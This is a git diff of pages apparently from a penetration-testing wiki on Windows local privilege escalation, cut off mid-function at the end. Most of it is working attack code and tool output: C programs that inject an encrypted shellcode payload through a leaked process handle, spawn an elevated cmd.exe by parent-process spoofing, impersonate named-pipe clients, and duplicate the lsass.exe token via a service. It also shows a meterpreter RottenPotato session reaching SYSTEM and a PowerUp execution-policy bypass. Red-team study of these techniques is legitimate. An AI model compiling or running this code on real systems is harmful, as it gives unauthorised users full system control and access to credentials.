+	unsigned char payload[] = { 0x6b, 0x98, 0xe8, 0x38, 0xaf, 0x82, 0xdc, 0xd4, 0xda, 0x57, 0x15, 0x48, 0x2f, 0xf0, 0x4e, 0xd3, 0x1a, 0x70, 0x6d, 0xbf, 0x53, 0xa8, 0xcb, 0xbb, 0xbb, 0x38, 0xf6, 0x4e, 0xee, 0x84, 0x36, 0xe5, 0x25, 0x76, 0xce, 0xb0, 0xf6, 0x39, 0x22, 0x76, 0x36, 0x3c, 0xe1, 0x13, 0x18, 0x9d, 0xb1, 0x6e, 0x0, 0x55, 0x8a, 0x4f, 0xb8, 0x2d, 0xe7, 0x6f, 0x91, 0xa8, 0x79, 0x4e, 0x34, 0x88, 0x24, 0x61, 0xa4, 0xcf, 0x70, 0xdb, 0xef, 0x25, 0x96, 0x65, 0x76, 0x7, 0xe7, 0x53, 0x9, 0xbf, 0x2d, 0x92, 0x25, 0x4e, 0x30, 0xa, 0xe7, 0x69, 0xaf, 0xf7, 0x32, 0xa6, 0x98, 0xd3, 0xbe, 0x2b, 0x8, 0x90, 0x0, 0x9e, 0x3f, 0x58, 0xed, 0x21, 0x69, 0xcb, 0x38, 0x5d, 0x5e, 0x68, 0x5e, 0xb9, 0xd6, 0xc5, 0x92, 0xd1, 0xaf, 0xa2, 0x5d, 0x16, 0x23, 0x48, 0xbc, 0xdd, 0x2a, 0x9f, 0x3c, 0x22, 0xdb, 0x19, 0x24, 0xdf, 0x86, 0x4a, 0xa2, 0xa0, 0x8f, 0x1a, 0xe, 0xd6, 0xb7, 0xd2, 0x6c, 0x6d, 0x90, 0x55, 0x3e, 0x7d, 0x9b, 0x69, 0x87, 0xad, 0xd7, 0x5c, 0xf3, 0x1, 0x7c, 0x93, 0x1d, 0xaa, 0x40, 0xf, 0x15, 0x48, 0x5b, 0xad, 0x6, 0xb5, 0xe5, 0xb9, 0x92, 0xae, 0x9b, 0xdb, 0x9a, 0x9b, 0x4e, 0x44, 0x45, 0xdb, 0x9f, 0x28, 0x90, 0x9e, 0x63, 0x23, 0xf2, 0xca, 0xab, 0xa7, 0x68, 0xbc, 0x31, 0xb4, 0xf9, 0xbb, 0x73, 0xd4, 0x56, 0x94, 0x2c, 0x63, 0x47, 0x21, 0x84, 0xa2, 0xb6, 0x91, 0x23, 0x8f, 0xa0, 0x46, 0x76, 0xff, 0x3f, 0x75, 0xd, 0x51, 0xc5, 0x70, 0x26, 0x1, 0xcf, 0x23, 0xbf, 0x97, 0xb2, 0x8d, 0x66, 0x35, 0xc8, 0xe3, 0x2, 0xf6, 0xbd, 0x44, 0x83, 0xf2, 0x80, 0x4c, 0xd0, 0x7d, 0xa3, 0xbd, 0x33, 0x8e, 0xe8, 0x6, 0xbc, 0xdc, 0xff, 0xe0, 0x96, 0xd9, 0xdc, 0x87, 0x2a, 0x81, 0xf3, 0x53, 0x37, 0x16, 0x3a, 0xcc, 0x3c, 0x34, 0x4, 0x9c, 0xc6, 0xbb, 0x12, 0x72, 0xf3, 0xa3, 0x94, 0x5d, 0x19, 0x43, 0x56, 0xa8, 0xba, 0x2a, 0x1d, 0x12, 0xeb, 0xd2, 0x6e, 0x79, 0x65, 0x2a };
+	unsigned int payload_len = sizeof(payload);
+
+	printf("My PID: %d\n", GetCurrentProcessId());
+	getchar();
+	
+	// find a leaked handle to a process
+	hProc = GetVulnProcHandle();
+	
+	if ( hProc != NULL) {
+		
+		// d#Decrypt payload
+		AESDecrypt((char *) payload, payload_len, key, sizeof(key));
+		printf("[+] Sending gift...");
+		// Inject and run the payload in the privileged context
+		Inject(hProc, payload, payload_len);
+		printf("done.\n");
+	}
+	getchar();
+
+    return 0;
+}
+```
+
+## Exploit Example 2
+
+{% hint style="info" %}
+In a real scenario you probably **won't be able to control the binary** that is going to be executed by the vulnerable code \(_C:\users\username\desktop\client.exe_ in this case\). Probably you will **compromise a process and you will need to look if you can access any vulnerable handle of any privileged process**.
+{% endhint %}
+
+In this example, **instead of abusing the open handle to inject** and execute a shellcode, it's going to be **used the token of the privileged open handle process to create a new one**. This is done in lines from 138 to 148.
+
+Note how the **function `UpdateProcThreadAttribute`** is used with the **attribute  `PROC_THREAD_ATTRIBUTE_PARENT_PROCESS` and the handle to the open privileged process**. This means that the **created process thread executing** _**cmd.exe**_ **will have the same token privilege as the open handle process**.
+
+```c
+#include <windows.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <time.h>
+#include <wincrypt.h>
+#include <psapi.h>
+#include <tchar.h>
+#include <tlhelp32.h>
+#include "client.h"
+#pragma comment (lib, "crypt32.lib")
+#pragma comment (lib, "advapi32")
+#pragma comment (lib, "kernel32")
+
+
+HANDLE GetVulnProcHandle(void) {
+    
+	ULONG handleInfoSize = 0x10000;
+    NTSTATUS status;
+    PSYSTEM_HANDLE_INFORMATION phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) malloc(handleInfoSize);
+	HANDLE hProc = NULL;
+	POBJECT_TYPE_INFORMATION objectTypeInfo;
+	PVOID objectNameInfo;
+	UNICODE_STRING objectName;
+    ULONG returnLength;
+    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
+    DWORD dwOwnPID = GetCurrentProcessId();
+	
+    pNtQuerySystemInformation = GetProcAddress(hNtdll, "NtQuerySystemInformation");
+    pNtDuplicateObject = GetProcAddress(hNtdll, "NtDuplicateObject");
+    pNtQueryObject = GetProcAddress(hNtdll, "NtQueryObject");
+    pRtlEqualUnicodeString = GetProcAddress(hNtdll, "RtlEqualUnicodeString");
+    pRtlInitUnicodeString = GetProcAddress(hNtdll, "RtlInitUnicodeString");
+
+    printf("[+] Grabbing handles...");
+
+    while ((status = pNtQuerySystemInformation( SystemHandleInformation, phHandleInfo, handleInfoSize,
+											NULL )) == STATUS_INFO_LENGTH_MISMATCH)
+        phHandleInfo = (PSYSTEM_HANDLE_INFORMATION) realloc(phHandleInfo, handleInfoSize *= 2);
+
+    if (status != STATUS_SUCCESS)
+    {
+        printf("[!] NtQuerySystemInformation failed!\n");
+        return 0;
+    }
+
+    printf("done.\n[+] Fetched %d handles.\n", phHandleInfo->NumberOfHandles);
+
+    // iterate handles until we find the privileged process handle
+    for (int i = 0; i < phHandleInfo->NumberOfHandles; ++i)
+    {
+        SYSTEM_HANDLE_TABLE_ENTRY_INFO handle = phHandleInfo->Handles[i];
+
+        // Check if this handle belongs to our own process
+        if (handle.UniqueProcessId != dwOwnPID)
+            continue;
+
+        objectTypeInfo = (POBJECT_TYPE_INFORMATION) malloc(0x1000);
+        if (pNtQueryObject( (HANDLE) handle.HandleValue,
+						ObjectTypeInformation,
+						objectTypeInfo,
+						0x1000,
+						NULL ) != STATUS_SUCCESS)
+            continue;
+
+		// skip some objects to avoid getting stuck
+		// see: https://github.com/adamdriscoll/PoshInternals/issues/7
+        if (handle.GrantedAccess == 0x0012019f
+			&& handle.GrantedAccess != 0x00120189
+			&& handle.GrantedAccess != 0x120089
+			&& handle.GrantedAccess != 0x1A019F ) {
+            free(objectTypeInfo);
+            continue;
+        }
+
+		// get object name information
+        objectNameInfo = malloc(0x1000);
+        if (pNtQueryObject( (HANDLE) handle.HandleValue,
+						ObjectNameInformation,
+						objectNameInfo,
+						0x1000,
+						&returnLength ) != STATUS_SUCCESS) {
+            
+			// adjust the size of a returned object and query again
+			objectNameInfo = realloc(objectNameInfo, returnLength);
+            if (pNtQueryObject( (HANDLE) handle.HandleValue,
+							ObjectNameInformation,
+							objectNameInfo,
+							returnLength,
+							NULL ) != STATUS_SUCCESS) {
+                free(objectTypeInfo);
+                free(objectNameInfo);
+                continue;
+            }
+        }
+
+        // check if we've got a process object
+        objectName = *(PUNICODE_STRING) objectNameInfo;
+        UNICODE_STRING pProcess;
+
+        pRtlInitUnicodeString(&pProcess, L"Process");
+        if (pRtlEqualUnicodeString(&objectTypeInfo->TypeName, &pProcess, TRUE)) {
+            printf("[+] Found process handle (%x)\n", handle.HandleValue);
+            hProc = (HANDLE) handle.HandleValue;
+			free(objectTypeInfo);
+			free(objectNameInfo);
+			break;
+        }
+        else
+            continue;
+        
+        free(objectTypeInfo);
+        free(objectNameInfo);
+    }
+	
+	return hProc;
+} 
+
+
+int main(int argc, char **argv) {
+	
+	HANDLE hProc = NULL;
+    STARTUPINFOEXA si;
+    PROCESS_INFORMATION pi;
+	int pid = 0;
+	SIZE_T size;
+	BOOL ret;
+
+	Sleep(20000);
+	// find leaked process handle
+	hProc = GetVulnProcHandle();
+
+	if ( hProc != NULL) {
+
+		// Adjust proess attributes with PROC_THREAD_ATTRIBUTE_PARENT_PROCESS
+		ZeroMemory(&si, sizeof(STARTUPINFOEXA));
+
+		InitializeProcThreadAttributeList(NULL, 1, 0, &size);
+		si.lpAttributeList = (LPPROC_THREAD_ATTRIBUTE_LIST) HeapAlloc( GetProcessHeap(), 0, size );
+		
+		InitializeProcThreadAttributeList(si.lpAttributeList, 1, 0, &size);
+		UpdateProcThreadAttribute(si.lpAttributeList, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hProc, sizeof(HANDLE), NULL, NULL);
+
+		si.StartupInfo.cb = sizeof(STARTUPINFOEXA);
+		
+		// Spawn elevated cmd process
+		ret = CreateProcessA( "C:\\Windows\\system32\\cmd.exe", NULL, NULL, NULL, TRUE, 
+			EXTENDED_STARTUPINFO_PRESENT | CREATE_NEW_CONSOLE, NULL, NULL, (LPSTARTUPINFOA)(&si), &pi );
+
+		if (ret == FALSE) {
+			printf("[!] Error spawning new process: [%d]\n", GetLastError());
+			return -1;
+		}
+	}
+	
+	Sleep(20000);
+    return 0;
+}
+```
+
diff --git a/windows/windows-local-privilege-escalation/msi-wrapper.md b/windows/windows-local-privilege-escalation/msi-wrapper.md
new file mode 100644
index 00000000..fb97ab5a
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/msi-wrapper.md
@@ -0,0 +1,18 @@
+# MSI Wrapper
+
+Download the free version app from [https://www.exemsi.com/documentation/getting-started/](https://www.exemsi.com/download/), execute it and wrap the "malicious" binary on it:
+
+![](../../.gitbook/assets/image%20%2848%29.png)
+
+And this is the most important part of the configuration:
+
+![](../../.gitbook/assets/image%20%28294%29.png)
+
+![](../../.gitbook/assets/image%20%2812%29.png)
+
+![](../../.gitbook/assets/image%20%28200%29.png)
+
+\(Please, note that if you try to pack your own binary you will be able to modify these values\)
+
+From here just click on **nexts butons** and the last **build button and your installer/wrapper will be generated.**
+
diff --git a/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md
new file mode 100644
index 00000000..75d021aa
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/named-pipe-client-impersonation.md
@@ -0,0 +1,164 @@
+# Named Pipe Client Impersonation
+
+**This information was copied from** [**https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation**](https://ired.team/offensive-security/privilege-escalation/windows-namedpipes-privilege-escalation)\*\*\*\*
+
+## Overview
+
+A `pipe` is a block of shared memory that processes can use for communication and data exchange.
+
+`Named Pipes` is a Windows mechanism that enables two unrelated processes to exchange data between themselves, even if the processes are located on two different networks. It's very simar to client/server architecture as notions such as `a named pipe server` and a named `pipe client` exist.
+
+A named pipe server can open a named pipe with some predefined name and then a named pipe client can connect to that pipe via the known name. Once the connection is established, data exchange can begin.
+
+This lab is concerned with a simple PoC code that allows:
+
+* creating a single-threaded dumb named pipe server that will accept one client connection
+* named pipe server to write a simple message to the named pipe so that the pipe client can read it
+
+## Code
+
+Below is the PoC for both the server and the client:
+
+{% tabs %}
+{% tab title="namedPipeServer.cpp" %}
+```cpp
+#include "pch.h"
+#include <Windows.h>
+#include <iostream>
+
+int main() {
+	LPCWSTR pipeName = L"\\\\.\\pipe\\mantvydas-first-pipe";
+	LPVOID pipeBuffer = NULL;
+	HANDLE serverPipe;
+	DWORD readBytes = 0;
+	DWORD readBuffer = 0;
+	int err = 0;
+	BOOL isPipeConnected;
+	BOOL isPipeOpen;
+	wchar_t message[] = L"HELL";
+	DWORD messageLenght = lstrlen(message) * 2;
+	DWORD bytesWritten = 0;
+
+	std::wcout << "Creating named pipe " << pipeName << std::endl;
+	serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);
+	
+	isPipeConnected = ConnectNamedPipe(serverPipe, NULL);
+	if (isPipeConnected) {
+		std::wcout << "Incoming connection to " << pipeName << std::endl;
+	}
+	
+	std::wcout << "Sending message: " << message << std::endl;
+	WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL);
+	
+	return 0;
+}
+```
+{% endtab %}
+
+{% tab title="namedPipeClient.cpp" %}
+```cpp
+#include "pch.h"
+#include <iostream>
+#include <Windows.h>
+
+const int MESSAGE_SIZE = 512;
+
+int main()
+{
+	LPCWSTR pipeName = L"\\\\10.0.0.7\\pipe\\mantvydas-first-pipe";
+	HANDLE clientPipe = NULL;
+	BOOL isPipeRead = true;
+	wchar_t message[MESSAGE_SIZE] = { 0 };
+	DWORD bytesRead = 0;
+
+	std::wcout << "Connecting to " << pipeName << std::endl;
+	clientPipe = CreateFile(pipeName, GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, 0, NULL);
+	
+	while (isPipeRead) {
+		isPipeRead = ReadFile(clientPipe, &message, MESSAGE_SIZE, &bytesRead, NULL);
+		std::wcout << "Received message: " << message;
+	}
+
+	return 0;
+}
+```
+{% endtab %}
+{% endtabs %}
+
+## Execution
+
+Below shows the named pipe server and named pipe client working as expected:
+
+![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22%20%282%29.png)
+
+Worth nothing that the named pipes communication by default uses SMB protocol:
+
+![](../../.gitbook/assets/screenshot-from-2019-04-04-23-51-48.png)
+
+Checking how the process maintains a handle to our named pipe `mantvydas-first-pipe`:
+
+![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22%20%281%29.png)
+
+Similary, we can see the client having an open handle to the named pipe:
+
+![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22.png)
+
+We can even see our pipe with powershell:
+
+```csharp
+((Get-ChildItem \\.\pipe\).name)[-1..-5]
+```
+
+![](../../.gitbook/assets/screenshot-from-2019-04-02-23-44-22%20%283%29.png)
+
+## Token Impersonation
+
+{% hint style="info" %}
+Note that in order to impersonate the token of the client process you need to have \(the server process creating the pipe\) the **`SeImpersonate`** token privilege
+{% endhint %}
+
+It is possible for the named pipe server to impersonate the named pipe client's security context by leveraging a `ImpersonateNamedPipeClient` API call which in turn changes the named pipe server's current thread's token with that of the named pipe client's token.
+
+We can update the the named pipe server's code like this to achieve the impersonation - note that modifications are seen in line 25 and below: 
+
+```cpp
+int main() {
+	LPCWSTR pipeName = L"\\\\.\\pipe\\mantvydas-first-pipe";
+	LPVOID pipeBuffer = NULL;
+	HANDLE serverPipe;
+	DWORD readBytes = 0;
+	DWORD readBuffer = 0;
+	int err = 0;
+	BOOL isPipeConnected;
+	BOOL isPipeOpen;
+	wchar_t message[] = L"HELL";
+	DWORD messageLenght = lstrlen(message) * 2;
+	DWORD bytesWritten = 0;
+
+	std::wcout << "Creating named pipe " << pipeName << std::endl;
+	serverPipe = CreateNamedPipe(pipeName, PIPE_ACCESS_DUPLEX, PIPE_TYPE_MESSAGE, 1, 2048, 2048, 0, NULL);
+	
+	isPipeConnected = ConnectNamedPipe(serverPipe, NULL);
+	if (isPipeConnected) {
+		std::wcout << "Incoming connection to " << pipeName << std::endl;
+	}
+	
+	std::wcout << "Sending message: " << message << std::endl;
+	WriteFile(serverPipe, message, messageLenght, &bytesWritten, NULL);
+	
+	std::wcout << "Impersonating the client..." << std::endl;
+	ImpersonateNamedPipeClient(serverPipe);
+	err = GetLastError();	
+
+	STARTUPINFO	si = {};
+	wchar_t command[] = L"C:\\Windows\\system32\\notepad.exe";
+	PROCESS_INFORMATION pi = {};
+	HANDLE threadToken = GetCurrentThreadToken();
+	CreateProcessWithTokenW(threadToken, LOGON_WITH_PROFILE, command, NULL, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
+
+	return 0;
+}
+```
+
+Running the server and connecting to it with the client that is running under administrator@offense.local security context, we can see that the main thread of the named server pipe assumed the token of the named pipe client - offense\administrator, although the PipeServer.exe itself is running under ws01\mantvydas security context. Sounds like a good way to escalate privileges?
+
diff --git a/windows/windows-local-privilege-escalation/powerup.md b/windows/windows-local-privilege-escalation/powerup.md
new file mode 100644
index 00000000..d6e1124f
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/powerup.md
@@ -0,0 +1,29 @@
+# PowerUp
+
+## Invoke
+
+```text
+powershell -ep bypass
+. .\powerup.ps
+Invoke-AllChecks
+```
+
+## Checks
+
+_03/2019_
+
+* [x] Current privileges
+* [x] Unquoted service paths
+* [x] Service executable permissions
+* [x] Service permissions
+* [x] %PATH% for hijackable DLL locations
+* [x] AlwaysInstallElevated registry key
+* [x] Autologon credentials in registry
+* [x] Modifidable registry autoruns and configs
+* [x] Modifiable schtask files/configs
+* [x] Unattended install files
+* [x] Encrypted web.config strings
+* [x] Encrypted application pool and virtual directory passwords
+* [x] Plaintext passwords in McAfee SiteList.xml
+* [x] Cached Group Policy Preferences .xml files
+
diff --git a/windows/windows-local-privilege-escalation/rottenpotato.md b/windows/windows-local-privilege-escalation/rottenpotato.md
new file mode 100644
index 00000000..59173019
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/rottenpotato.md
@@ -0,0 +1,85 @@
+# RottenPotato
+
+The info in this page info was extracted [from this post](https://www.absolomb.com/2018-05-04-HackTheBox-Tally/)
+
+Service accounts usually have special privileges \(SeImpersonatePrivileges\) and this could be used to escalate privileges.
+
+[https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/](https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/)
+
+I won’t go into the details on how this exploit works, the article above explains it far better than I ever could.
+
+Let’s check our privileges with meterpreter:
+
+```text
+meterpreter > getprivs
+
+Enabled Process Privileges
+==========================
+
+Name
+----
+SeAssignPrimaryTokenPrivilege
+SeChangeNotifyPrivilege
+SeCreateGlobalPrivilege
+SeImpersonatePrivilege
+SeIncreaseQuotaPrivilege
+SeIncreaseWorkingSetPrivilege
+```
+
+Excellent, it looks like we have the privileges we need to perform the attack. Let’s upload `rottenpotato.exe`
+
+Back on our meterpreter session we load the `incognito` extension.
+
+```text
+meterpreter > use incognito
+Loading extension incognito...Success.
+meterpreter > list_tokens -u
+[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
+             Call rev2self if primary process token is SYSTEM
+
+Delegation Tokens Available
+========================================
+NT SERVICE\SQLSERVERAGENT
+NT SERVICE\SQLTELEMETRY
+TALLY\Sarah
+
+Impersonation Tokens Available
+========================================
+No tokens available
+```
+
+We can see we currently have no Impersonation Tokens. Let’s run the Rotten Potato exploit.
+
+```text
+meterpreter > execute -f rottenpotato.exe -Hc
+Process 3104 created.
+Channel 2 created.
+meterpreter > list_tokens -u
+[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
+             Call rev2self if primary process token is SYSTEM
+
+Delegation Tokens Available
+========================================
+NT SERVICE\SQLSERVERAGENT
+NT SERVICE\SQLTELEMETRY
+TALLY\Sarah
+
+Impersonation Tokens Available
+========================================
+NT AUTHORITY\SYSTEM
+```
+
+We need to quickly impersonate the token or it will disappear.
+
+```text
+meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
+[-] Warning: Not currently running as SYSTEM, not all tokens will beavailable
+             Call rev2self if primary process token is SYSTEM
+[-] No delegation token available
+[+] Successfully impersonated user NT AUTHORITY\SYSTEM
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+```
+
+Success! We have our SYSTEM shell and can grab the root.txt file!
+
diff --git a/windows/windows-local-privilege-escalation/seatbelt.md b/windows/windows-local-privilege-escalation/seatbelt.md
new file mode 100644
index 00000000..abcd6c7c
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/seatbelt.md
@@ -0,0 +1,89 @@
+# Seatbelt
+
+
+
+## Start
+
+[You need to compile it](https://github.com/GhostPack/Seatbelt) or [use precompiled binaries \(by me\)](https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt)
+
+```text
+SeatbeltNet3.5x64.exe all
+SeatbeltNet3.5x64.exe all full #Without filtering
+```
+
+I really like the performed filtering.
+
+## Check
+
+This tool is more gathering-info oriented than privesc, but it has some pretty nice checks and looks for some passwords.
+
+**SeatBelt.exe system** collects the following system data:
+
+```text
+BasicOSInfo           -   Basic OS info (i.e. architecture, OS version, etc.)
+RebootSchedule        -   Reboot schedule (last 15 days) based on event IDs 12 and 13
+TokenGroupPrivs       -   Current process/token privileges (e.g. SeDebugPrivilege/etc.)
+UACSystemPolicies     -   UAC system policies via the registry
+PowerShellSettings    -   PowerShell versions and security settings
+AuditSettings         -   Audit settings via the registry
+WEFSettings           -   Windows Event Forwarding (WEF) settings via the registry
+LSASettings           -   LSA settings (including auth packages)
+UserEnvVariables      -   Current user environment variables
+SystemEnvVariables    -   Current system environment variables
+UserFolders           -   Folders in C:\Users\
+NonstandardServices   -   Services with file info company names that don't contain 'Microsoft'
+InternetSettings      -   Internet settings including proxy configs
+LapsSettings          -   LAPS settings, if installed
+LocalGroupMembers     -   Members of local admins, RDP, and DCOM
+MappedDrives          -   Mapped drives
+RDPSessions           -   Current incoming RDP sessions
+WMIMappedDrives       -   Mapped drives via WMI
+NetworkShares         -   Network shares
+FirewallRules         -   Deny firewall rules, "full" dumps all
+AntiVirusWMI          -   Registered antivirus (via WMI)
+InterestingProcesses  -   "Interesting" processes- defensive products and admin tools
+RegistryAutoRuns      -   Registry autoruns
+RegistryAutoLogon     -   Registry autologon information
+DNSCache              -   DNS cache entries (via WMI)
+ARPTable              -   Lists the current ARP table and adapter information (equivalent to arp -a)
+AllTcpConnections     -   Lists current TCP connections and associated processes
+AllUdpConnections     -   Lists current UDP connections and associated processes
+NonstandardProcesses  -   Running processeswith file info company names that don't contain 'Microsoft'
+  *  If the user is in high integrity, the following additional actions are run:
+SysmonConfig          -   Sysmon configuration from the registry
+```
+
+**SeatBelt.exe user** collects the following user data:
+
+```text
+SavedRDPConnections   -   Saved RDP connections
+TriageIE              -   Internet Explorer bookmarks and history (last 7 days)
+DumpVault             -   Dump saved credentials in Windows Vault (i.e. logins from Internet Explorer and Edge), from SharpWeb
+RecentRunCommands     -   Recent "run" commands
+PuttySessions         -   Interesting settings from any saved Putty configurations
+PuttySSHHostKeys      -   Saved putty SSH host keys
+CloudCreds            -   AWS/Google/Azure cloud credential files (SharpCloud)
+RecentFiles           -   Parsed "recent files" shortcuts (last 7 days)
+MasterKeys            -   List DPAPI master keys
+CredFiles             -   List Windows credential DPAPI blobs
+RDCManFiles           -   List Windows Remote Desktop Connection Manager settings files
+  *  If the user is in high integrity, this data is collected for ALL users instead of just the current user
+```
+
+Non-default collection options:
+
+```text
+CurrentDomainGroups   -   The current user's local and domain groups
+Patches               -   Installed patches via WMI (takes a bit on some systems)
+LogonSessions         -   User logon session data
+KerberosTGTData       -   ALL TEH TGTZ!
+InterestingFiles      -   "Interesting" files matching various patterns in the user's folder
+IETabs                -   Open Internet Explorer tabs
+TriageChrome          -   Chrome bookmarks and history
+TriageFirefox         -   Firefox history (no bookmarks)
+RecycleBin            -   Items in the Recycle Bin deleted in the last 30 days - only works from a user context!
+4624Events            -   4624 logon events from the security event log
+4648Events            -   4648 explicit logon events from the security event log
+KerberosTickets       -   List Kerberos tickets. If elevated, grouped by all logon sessions.
+```
+
diff --git a/windows/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md b/windows/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
new file mode 100644
index 00000000..3de9b24a
--- /dev/null
+++ b/windows/windows-local-privilege-escalation/sedebug-+-seimpersonate-copy-token.md
@@ -0,0 +1,215 @@
+# SeDebug + SeImpersonate copy token
+
+The following code **exploits the privileges SeDebug and SeImpersonate** to copy the token from a **process running as SYSTEM** and with **all the token privileges**.   
+In this case, this code can be compiled and used as a **Windows service binary** to check that it's working.  
+However, the main part of the **code where the elevation occurs** is inside the **`Exploit`** **function**.  
+Inside of that function you can see that the **process** _**lsass.exe**_ **is searched**, then it's **token is copied**, and finally that **token is used to spawn a new** _**cmd.exe**_ **with all the privileges of the copied token**.
+
+**Other processes** running as SYSTEM with all or most of the token privileges are: _**services.exe**_**,** _**svhost.exe**_ \(on of the firsts ones\), _**wininit.exe**_**,** _**csrss.exe**_... \(_remember that you won't be able to copy a token from a Protected process_\). Moreover, you can use the tool [Process Hacker](https://processhacker.sourceforge.io/downloads.php) running as administrator to see the tokens of a process.
+
+```c
+#include <windows.h>
+#include <tlhelp32.h>
+#include <tchar.h>
+#pragma comment (lib, "advapi32")
+
+TCHAR* serviceName = TEXT("TokenDanceSrv");
+SERVICE_STATUS serviceStatus;
+SERVICE_STATUS_HANDLE serviceStatusHandle = 0;
+HANDLE stopServiceEvent = 0;
+
+//This function will find the pid of a process by name
+int FindTarget(const char *procname) {
+
+	HANDLE hProcSnap;
+	PROCESSENTRY32 pe32;
+	int pid = 0;
+			
+	hProcSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
+	if (INVALID_HANDLE_VALUE == hProcSnap) return 0;
+			
+	pe32.dwSize = sizeof(PROCESSENTRY32); 
+			
+	if (!Process32First(hProcSnap, &pe32)) {
+			CloseHandle(hProcSnap);
+			return 0;
+	}
+			
+	while (Process32Next(hProcSnap, &pe32)) {
+			if (lstrcmpiA(procname, pe32.szExeFile) == 0) {
+					pid = pe32.th32ProcessID;
+					break;
+			}
+	}
+			
+	CloseHandle(hProcSnap);
+			
+	return pid;
+}
+
+
+int Exploit(void) {
+	
+    HANDLE hSystemToken, hSystemProcess;
+	HANDLE dupSystemToken = NULL;
+    HANDLE hProcess, hThread;
+    STARTUPINFOA si;
+    PROCESS_INFORMATION pi;
+	int pid = 0;
+
+
+    ZeroMemory(&si, sizeof(si));
+    si.cb = sizeof(si);
+    ZeroMemory(&pi, sizeof(pi));
+
+	// open high privileged process
+	if ( pid = FindTarget("lsass.exe") ) 
+		hSystemProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, pid);
+	else
+		return -1;
+	
+	// extract high privileged token
+    if (!OpenProcessToken(hSystemProcess, TOKEN_ALL_ACCESS, &hSystemToken)) {
+        CloseHandle(hSystemProcess);
+        return -1;
+    }
+	
+	// make a copy of a token
+	DuplicateTokenEx(hSystemToken, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &dupSystemToken);	
+
+	// and spawn a new process with higher privs
+    CreateProcessAsUserA(dupSystemToken, "C:\\windows\\system32\\cmd.exe", 
+						NULL, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi);
+
+    return 0;
+}
+
+
+void WINAPI ServiceControlHandler( DWORD controlCode ) {
+	switch ( controlCode ) {
+		case SERVICE_CONTROL_SHUTDOWN:
+		case SERVICE_CONTROL_STOP:
+			serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+			SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+			SetEvent( stopServiceEvent );
+			return;
+
+		case SERVICE_CONTROL_PAUSE:
+			break;
+
+		case SERVICE_CONTROL_CONTINUE:
+			break;
+
+		case SERVICE_CONTROL_INTERROGATE:
+			break;
+
+		default:
+			break;
+	}
+	SetServiceStatus( serviceStatusHandle, &serviceStatus );
+}
+
+void WINAPI ServiceMain( DWORD argc, TCHAR* argv[] ) {
+	// initialise service status
+	serviceStatus.dwServiceType = SERVICE_WIN32;
+	serviceStatus.dwCurrentState = SERVICE_STOPPED;
+	serviceStatus.dwControlsAccepted = 0;
+	serviceStatus.dwWin32ExitCode = NO_ERROR;
+	serviceStatus.dwServiceSpecificExitCode = NO_ERROR;
+	serviceStatus.dwCheckPoint = 0;
+	serviceStatus.dwWaitHint = 0;
+
+	serviceStatusHandle = RegisterServiceCtrlHandler( serviceName, ServiceControlHandler );
+
+	if ( serviceStatusHandle ) {
+		// service is starting
+		serviceStatus.dwCurrentState = SERVICE_START_PENDING;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+		// do initialisation here
+		stopServiceEvent = CreateEvent( 0, FALSE, FALSE, 0 );
+
+		// running
+		serviceStatus.dwControlsAccepted |= (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+		serviceStatus.dwCurrentState = SERVICE_RUNNING;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+		Exploit();
+		WaitForSingleObject( stopServiceEvent, -1 );
+
+		// service was stopped
+		serviceStatus.dwCurrentState = SERVICE_STOP_PENDING;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+
+		// do cleanup here
+		CloseHandle( stopServiceEvent );
+		stopServiceEvent = 0;
+
+		// service is now stopped
+		serviceStatus.dwControlsAccepted &= ~(SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN);
+		serviceStatus.dwCurrentState = SERVICE_STOPPED;
+		SetServiceStatus( serviceStatusHandle, &serviceStatus );
+	}
+}
+
+
+void InstallService() {
+	SC_HANDLE serviceControlManager = OpenSCManager( 0, 0, SC_MANAGER_CREATE_SERVICE );
+
+	if ( serviceControlManager ) {
+		TCHAR path[ _MAX_PATH + 1 ];
+		if ( GetModuleFileName( 0, path, sizeof(path)/sizeof(path[0]) ) > 0 ) {
+			SC_HANDLE service = CreateService( serviceControlManager,
+							serviceName, serviceName,
+							SERVICE_ALL_ACCESS, SERVICE_WIN32_OWN_PROCESS,
+							SERVICE_AUTO_START, SERVICE_ERROR_IGNORE, path,
